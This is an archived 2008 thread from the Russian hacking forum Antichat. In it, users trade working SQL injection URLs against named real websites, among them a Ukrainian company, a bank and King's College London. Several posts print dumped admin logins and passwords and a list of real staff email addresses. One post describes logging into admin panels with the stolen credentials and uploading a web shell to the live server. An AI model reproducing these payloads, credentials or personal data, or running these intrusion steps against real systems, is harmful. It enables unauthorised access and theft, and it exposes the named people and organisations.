ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

13.11.2008, 23:56
|
|
Познающий
Регистрация: 19.11.2007
Сообщений: 81
Провел на форуме: 509730
Репутация:
52
|
|
http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5
немогу дальше подобрать
|
|
|

14.11.2008, 00:23
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме: 438137
Репутация:
66
|
|
Сообщение от DREASTY
http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5
немогу дальше подобрать
google://information_schema
И вперед...
Последний раз редактировалось pento; 14.11.2008 в 00:37..
|
|
|

14.11.2008, 01:04
|
|
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме: 51589
Репутация:
55
|
|
Shop
Код:
http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,concat(user_name,0x3a,password)+from+users--
Код:
http://www.ultraproducts.com/admin/
|
|
|

14.11.2008, 01:52
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
Сообщение от DREASTY
http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5
немогу дальше подобрать
Код:
http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+table_name,2,3,4,5+from+information_schema.tables+limit+1,1--
И перебирай таблицы,пока не найдеш нужную тебе колонку....когда найдеш почитай тут
|
|
|

14.11.2008, 02:53
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме: 3395070
Репутация:
173
|
|
PR5
http://www.uwsn.org/sup.php?id=-99999+union+select+1,2,3,4,unhex(hex(version())),6/*
version:4.1.13-standard-log
|
|
|

14.11.2008, 04:56
|
|
Познающий
Регистрация: 19.11.2007
Сообщений: 81
Провел на форуме: 509730
Репутация:
52
|
|
Сообщение от -m0rgan-
Код:
http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+table_name,2,3,4,5+from+information_schema.tables+limit+1,1--
И перебирай таблицы,пока не найдеш нужную тебе колонку....когда найдеш почитай тут
Спасибо m0rgan !!
newtid@localhost
5.0.32-Debian_7etch8-log
http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+login,password,3,4,5+from+managers+ limit+1,1%20--
admin:shokhov
price:123456
isisis:123456
vale:valevale
irina:123
towka:123456
boris:123
margarita:123456
kuzoff:54214
админку так и не нашел!
|
|
|

14.11.2008, 16:57
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме: 3885269
Репутация:
1158
|
|
Акционерный коммерческий банк «Интеграл» (сокращенно АКБ «Интеграл-банк») – это универсальное банковское учреждение, предоставляющее полный комплекс услуг на внутреннем и внешнем финансовых рынках.
url: http://fxintegral.com/
target: http://fxintegral.com/beginer/ справа email подписка RSS
using: в имени вводим -999999' email: любой
Description: 4 поля. Вывод не приходит на email. Запрос -999' не обрабатывается, при нажатии отправить выводит SQL Syntax и.т.д. Запрос union+select+user(),user(),user(),user()/* проходит успешно. Вывод запроса опять же не приходит на email. Не показывается на странице.На сайте доступны различные банковские операции.
|
|
|

15.11.2008, 01:15
|
|
Новичок
Регистрация: 18.08.2008
Сообщений: 8
Провел на форуме: 56704
Репутация:
5
|
|
Сообщение от DREASTY
Спасибо m0rgan !!
newtid@localhost
5.0.32-Debian_7etch8-log
http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+login,password,3,4,5+from+managers+ limit+1,1%20--
admin:shokhov
price:123456
isisis:123456
vale:valevale
irina:123
towka:123456
boris:123
margarita:123456
kuzoff:54214
админку так и не нашел!
а толку то? совсем ничего не даёт, ну узнал пользователей, пароли, а применить некуда.
всю базу можно раскрутить а сделать ничего более.
file_priv закрыт, ни шэлл, ни другие пакости не проходят 
|
|
|

15.11.2008, 08:56
|
|
Новичок
Регистрация: 19.04.2008
Сообщений: 6
Провел на форуме: 28766
Репутация:
34
|
|
Сообщение от dArKkNiGHt
а толку то? совсем ничего не даёт, ну узнал пользователей, пароли, а применить некуда.
всю базу можно раскрутить а сделать ничего более.
file_priv закрыт, ни шэлл, ни другие пакости не проходят 
Эээ... Уважаемый , а что вы вообще хотите ??? Как то давно я поднимал тему на irc по поводу целесообразности и вообще надобности взломов 
Мало кто мог адекватно ответить для чего он ломает тот или иной ресурс. Сегодня за ночь пересмотрел почти всю эту ветку и тут помоему просто все учатся.
Человеку показали как сделать определенное движение) Он его сделал и сказал спасибо! Я считаю это резальт который нужен.
Спустя 20 мин)
Уважаемый, Хакер это не тот человек который знает скул и как ее крутит, хакер этот тот кто думает головой. Перед тем как или во время поиска скули надо обращать внимание на все... надо собирать информацию об атакуемом сервере и понимать в конечном итоге что тебе надо от него , если только БД , то наш уважаемый -DREASTY- , толко что показал что данные очень элементарно экспортируются из БД администратора в наш Notepad++  это уже в своем роде пакость (а для кого то возможно и деньги), так что на ваш вопрос по поводу того "а толку то?" лично я ответил.
Идем далее, с чего вы делаете такие поспешные выводы относителньо того что дальше ничего не сделать? Подколоть старательного ученика в том что он плохо научился пользоваться MySQL 5.+? Или это просто ваши выводы из ходя из того что Вы ничего не смогли сделать???
Итак(после быстрого моего анализа):
_http://www.tid.odessa.ua/phpinfo.php
_http://www.tid.odessa.ua/adserv/www/admin/
(пароль и логин подходят)
это чисто управление пользователями,кликами,бан нерами,БД,ПО,обновлением ддвига... после 10 минутнорго мучения заливки шелла через баннер shell.php.gif при том что там менял настройки хранения банера не в БД и не стороннем сервере а именно в каталоге сайта ... прав на исполнение все равно не было... поэтому шелл как был залит так и удален.  болше ничего пробовать не сстал, поскольку понимал что где должно быть управление контентом сайта...
Так оно и есть _http://www.tid.odessa.ua/siteadmin/
(логин пароль опять же подходят)
там сразу есть заливка файлов  прям первая первая страничка ... тыдынс _http://www.tid.odessa.ua/files/achat.php , поскольку не люблю функционал этого шелла сразу через еще и другой шелл. Более того права на сервере не велики , но на чтение практически все. более того можем вылезти из корней директории выше на другие сайты ... 2ip показал что их 3 , но в реале их там больше!
Вывод: Уважаемый не делайте поспешных выводов!!!
Прошу простить Администрацию и Модератора за типа оффтоп... ну просто правда выбесил пассажир =((
Последний раз редактировалось jjokker; 15.11.2008 в 10:09..
|
|
|

15.11.2008, 13:48
|
|
Новичок
Регистрация: 19.04.2008
Сообщений: 6
Провел на форуме: 28766
Репутация:
34
|
|
Сообщение от [sql]
пр 8 тиц 700
Код:
http://www.kcl.ac.uk/news/events_details.php?year=2008&event_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--
не чего не выводит, но есть другая
Код:
http://www.kcl.ac.uk/news/news_details.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25--&year=2008
к сожелению мало чем помогло)
еду пр 5
Код:
http://www.mfhs.edu/news/news_display.asp?artID=-1+or+1=@@version--
_http://www.kcl.ac.uk/news/news_details.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,email ,15,16,17,18,19,20,21,22,23,24,25+from+users--&year=2008
4.1.22-standard-log::webteam_newsdev::newsdev@localhost
Next:
waqar.alam@kcl.ac.uk
christopher.saward@kcl.ac.uk
julie.munk@kcl.ac.uk
susan.farrell@kcl.ac.uk
peter.graham@kcl.ac.uk
alex.bevis@kcl.ac.uk
kate.moore@kcl.ac.uk
kate.saunders@kcl.ac.uk
liz.newell@kcl.ac.uk
melanie.gardner@kcl.ac.uk
webnews@kcl.ac.uk
kate.thomas@kcl.ac.uk
префиксов нет ни перед таблицами ни в колонках.
поэтому твоя фраза "к сожелению мало чем помогло)", черезчур поспешна ... кто ищет тот всегда найдет ...
Последний раз редактировалось jjokker; 15.11.2008 в 14:20..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|